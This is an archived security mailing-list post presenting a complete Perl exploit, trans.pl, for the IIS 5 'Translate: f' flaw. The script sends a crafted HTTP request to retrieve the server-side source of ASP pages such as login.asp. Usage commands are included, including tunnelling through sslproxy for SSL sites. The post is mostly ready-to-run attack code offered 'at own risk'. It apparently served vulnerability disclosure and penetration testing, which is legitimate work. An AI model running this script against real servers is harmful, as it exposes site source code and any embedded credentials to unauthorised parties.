Translate:f [another PERL exploit]

[Roelof Temmingh <roelof () SENSEPOST COM>]

Below another PERL exloit:
Does not require LWP::UserAgent.
Will also work for virtually hosted sites.
Can easily be used against SSL sites (with the use of sslproxy)

Typical use:
perl trans.pl www.the_iis5_box.com login.asp 80

For use against SSL sites:
1) sslproxy -L 127.0.0.1 -l 7555 -R IP_of_iis5_box -r 443 -v Class3.pem
2) perl trans.pl 127.0.0.1 login.asp 7555

Use at own risk/etc etc.

Regards,
Roelof.

---cut: trans.pl---
#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp () wiretrip net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
---cut----
------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com